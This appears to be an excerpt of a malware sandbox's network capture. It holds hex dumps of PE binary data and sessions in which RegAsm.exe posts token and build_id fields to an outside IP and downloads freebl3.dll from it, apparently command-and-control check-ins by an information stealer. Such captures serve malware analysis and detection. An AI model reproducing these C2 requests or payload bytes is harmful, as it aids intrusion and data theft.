cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-04-23 19:44:04 UTC	16384	IN	Data Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: X~e!*FW\|>\|L1146
2024-04-23 19:44:04 UTC	16384	IN	Data Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
2024-04-23 19:44:04 UTC	16384	IN	Data Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08 Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
2024-04-23 19:44:04 UTC	16384	IN	Data Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff Data Ascii: $;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|D$9D$8vQ
2024-04-23 19:44:04 UTC	16384	IN	Data Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-04-23 19:44:04 UTC	16384	IN	Data Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
2024-04-23 19:44:04 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 Data Ascii: Vt$W\|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
2024-04-23 19:44:04 UTC	16384	IN	Data Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$L$J_
2024-04-23 19:44:04 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49714	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:06 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJD User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:44:06 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 Data Ascii: ------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------HJDGHIJDGCBAAAAAFIJDCont
2024-04-23 19:44:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 19:44:07 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49715	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:07 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAEC User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:44:07 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------EHIJDHCAKKFCBGCBAAECCont
2024-04-23 19:44:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 19:44:08 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49716	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:08 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHIIJJJKEGIDGCBAFIJ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 19:44:08 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 49 4a 4a 4a 4b 45 47 49 44 47 43 42 41 46 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------IDHIIJJJKEGIDGCBAFIJContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------IDHIIJJJKEGIDGCBAFIJCont
2024-04-23 19:44:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-23 19:44:09 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49717	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:09 UTC	157	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Cache-Control: no-cache
2024-04-23 19:44:10 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:10 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-a7550" Accept-Ranges: bytes
2024-04-23 19:44:10 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-04-23 19:44:10 UTC	16384	IN	Data Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b Data Ascii: }1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x]E0
2024-04-23 19:44:10 UTC	16384	IN	Data Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90 Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
2024-04-23 19:44:10 UTC	16384	IN	Data Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
2024-04-23 19:44:10 UTC	16384	IN	Data Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
2024-04-23 19:44:10 UTC	16384	IN	Data Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0 Data Ascii: }EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w w1
2024-04-23 19:44:10 UTC	16384	IN	Data Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 